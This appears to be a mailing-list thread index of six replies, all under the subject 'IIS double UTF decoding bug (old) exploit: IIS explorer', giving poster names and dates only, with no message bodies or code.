- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Erik Fichtner (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Matthew S. Hallacy (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)